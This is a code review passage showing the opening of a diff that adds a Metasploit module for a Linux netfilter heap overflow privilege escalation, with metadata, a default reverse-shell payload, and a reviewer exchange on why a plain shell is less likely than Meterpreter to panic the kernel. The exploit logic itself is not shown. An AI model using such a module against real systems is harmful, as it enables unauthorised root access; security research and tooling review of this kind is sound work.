modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb

```diff
@@ -0,0 +1,107 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+  include Msf::Post::Common
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation',
+        'Description' => %q{
+          An issue was discovered in the Linux kernel through 5.18.9.
+          A type confusion bug in nft_set_elem_init (leading to a buffer overflow)
+          could be used by a local attacker to escalate privileges.
+          The attacker can obtain root access, but must start with an unprivileged
+          user namespace to obtain CAP_NET_ADMIN access.
+          The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC
+          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates
+        ],
+        'DisclosureDate' => '2022-02-07', # YYYY-DD-MM. Public disclosure date
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'SessionTypes' => %w[meterpreter shell],
+        'DefaultOptions' => {
+          'Payload' => 'linux/x64/shell_reverse_tcp',
```

Comment:
Is there a reason not to use a Meterpreter payload?

Reply:
Meterpreter seems to work fine, but I've had some kernel panics on some tries, so I thought a normal shell would perform less syscalls / have a lesser chance of crashing the system.